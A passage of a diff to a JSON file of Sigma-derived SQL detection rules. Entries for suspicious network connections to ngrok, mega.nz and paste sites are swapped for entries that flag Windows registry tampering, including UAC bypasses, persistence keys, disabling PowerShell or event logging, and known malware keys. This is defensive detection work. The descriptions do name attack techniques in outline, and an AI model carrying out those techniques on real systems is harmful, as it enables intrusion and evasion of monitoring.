'4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": 
"RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS 
server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. 
In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '3389' AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program 
Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "status": "experimental", + "description": "Detects potential persistence activity via outlook today pages. 
An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE 
'%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of the registry to disable a system restore on the computer", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value 
modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "status": "experimental", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": 
"919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - 
"title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT 
* FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.010" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE 
'%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - 
"attack.persistence", "attack.t1112" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - 
"id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' 